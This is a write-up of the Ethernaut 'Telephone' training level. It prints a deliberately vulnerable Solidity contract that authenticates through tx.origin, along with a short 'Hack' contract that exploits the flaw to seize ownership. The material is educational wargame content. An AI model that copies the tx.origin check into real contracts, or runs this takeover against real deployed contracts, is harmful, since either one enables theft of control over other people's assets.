Step 1: Understand the Vulnerability

  1. Copy the vulnerable "Telephone" contract from Ethernaut into Remix.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    function changeOwner(address _owner) public {
        if (tx.origin != msg.sender) {
            owner = _owner;
        }
    }
}

The vulnerability lies in the changeOwner function. It only checks if the transaction's origin (tx.origin) is not equal to the sender (msg.sender) to change the owner.

Step 2: Exploit the Vulnerability

  1. Write the "Hack" contract:

pragma solidity ^0.8.0;

contract Hack {
    constructor(address _target) {
        Telephone(_target).changeOwner(msg.sender);
    }
}

Step 3: Deploy and Verify the Exploit

  1. Deploy the "Hack" contract:
  2. Verify the exploit:

SUCCESS

Explanation:

  1. You've copied the "Telephone" contract from Ethernaut, which contains a vulnerability in the changeOwner function.
  2. You've written the "Hack" contract, which exploits the vulnerability by calling the changeOwner function of the "Telephone" contract and passing your wallet address as the new owner.
  3. By deploying the "Hack" contract, you trigger the changeOwner function in the "Telephone" contract, effectively changing the owner to your wallet address.
  4. After the exploit, you can verify the ownership change by checking the "owner" state variable of the "Telephone" contract.